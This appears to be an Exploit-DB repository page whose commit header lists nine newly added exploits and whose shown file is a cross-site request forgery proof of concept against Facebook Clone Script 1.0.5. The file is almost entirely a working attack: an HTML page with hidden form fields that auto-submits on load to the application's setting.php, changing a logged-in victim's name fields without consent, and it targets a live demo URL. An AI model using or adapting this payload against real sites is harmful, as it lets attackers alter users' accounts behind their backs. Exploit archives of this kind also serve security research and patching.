96e4f1686b
9 changes to exploits/shellcodes GNU Barcode 0.99 - Buffer Overflow GNU Barcode 0.99 - Memory Leak IssueTrak 7.0 - SQL Injection Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection NUUO NVRmini2 / NVRsolo - Arbitrary File Upload MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting Pivotal Spring Java Framework < 5.0 - Remote Code Execution Facebook Clone Script 1.0.5 - 'search' SQL Injection Facebook Clone Script 1.0.5 - Cross-Site Request Forgery
28 lines
No EOL
817 B
Text
28 lines
No EOL
817 B
Text
# Exploit Title: Facebook Clone Script 1.0.5 - Cross-Site Request Forgery
|
|
# Date: 2018-05-29
|
|
# Exploit Author: L0RD
|
|
# Vendor Homepage: https://www.phpscriptsmall.com/product/facebook-clone/
|
|
# Version: 1.0.5
|
|
# Tested on: Win 10
|
|
|
|
# Description :
|
|
# Facebook Clone Script 1.0.5 has csrf vulnerability which attacker can
|
|
# easily change user information .
|
|
|
|
# POC :
|
|
|
|
<html>
|
|
<head>
|
|
<title>Change information</title>
|
|
</head>
|
|
<body>
|
|
<form action="http://smsemailmarketing.in/demo/fbclone/setting.php" method="POST">
|
|
<input type="hidden" name="fn" value="anything" />
|
|
<input type="hidden" name="ln" value="anything" />
|
|
<input type="hidden" name="chnname" value="anything" />
|
|
</form>
|
|
<script>
|
|
document.forms[0].submit();
|
|
</script>
|
|
</body>
|
|
</html> |